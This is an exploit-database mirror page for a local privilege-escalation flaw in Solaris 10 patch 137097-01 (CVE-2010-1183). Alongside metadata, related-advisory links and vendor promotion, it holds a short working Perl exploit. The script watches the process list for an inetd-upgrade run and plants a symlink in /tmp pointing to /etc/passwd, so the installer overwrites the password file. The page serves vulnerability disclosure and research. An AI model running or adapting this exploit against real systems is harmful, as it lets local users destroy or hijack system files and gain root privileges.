Lucene search
+L

Solaris 10 Patch 137097-01 - Symlink Privilege Escalation

🗓️ 11 Aug 2012 00:00:00Reported by Larry CashdollarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Solaris 10 Patch 137097-01 Symlink Privilege Escalation Local attackers can gain elevated privilege

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-1183
24 Mar 201000:00
circl
CVE
CVE-2010-1183
29 Mar 201022:00
cve
Cvelist
CVE-2010-1183
29 Mar 201022:00
cvelist
Exploit DB
Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
9 Jul 201300:00
exploitdb
Exploit DB
Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
24 Mar 201000:00
exploitdb
EUVD
EUVD-2010-1213
7 Oct 202500:30
euvd
NVD
CVE-2010-1183
29 Mar 201022:30
nvd
Packet Storm
Solaris Recommended Patch Cluster 6/19 Local Root
8 Jul 201300:00
packetstorm
Prion
Design/Logic Flaw
29 Mar 201022:30
prion
source: https://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to gain elevated privileges on affected computers.

#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) {
        print "Symlinking iconf_entries.$args[1] to  $clobber\n";
        symlink($clobber,"/tmp/iconf_entries.$args[1]");
        exit(1);
   }
 }

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 23.3
EPSS0.00494
21